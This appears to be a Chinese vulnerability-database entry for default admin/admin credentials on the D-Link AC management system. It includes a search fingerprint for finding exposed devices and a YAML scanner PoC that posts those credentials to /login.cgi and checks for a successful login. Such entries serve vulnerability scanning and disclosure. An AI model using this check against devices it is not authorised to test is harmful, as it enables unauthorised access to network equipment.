dlink-ac-default-password: D-Link AC管理系统默认账号密码

日期: 2025-09-01 | 影响软件: D-Link AC管理系统 | POC: 已公开

漏洞描述

D-Link AC管理系统存在默认账号密码,可被获取敏感信息 "AC集中管理平台" && body="D-Link路由器管理页"

PoC代码[已公开]

id: dlink-ac-default-password

info:
  name: D-Link AC管理系统默认账号密码
  author: jijue
  severity: high
  verified: false
  description: |
    D-Link AC管理系统存在默认账号密码,可被获取敏感信息
    "AC集中管理平台" && body="D-Link路由器管理页"

rules:
  r0:
    request:
      method: POST
      path: /login.cgi?set_language=CN
      body: user=admin&password=admin&selectLanguage=CN&Submit=%E7%99%BB%E9%99%86
    expression: response.status == 200 && response.body.bcontains(b"window.open('index.htm?_") && response.raw_header.ibcontains(b"set-cookie")
expression: r0()

相关漏洞推荐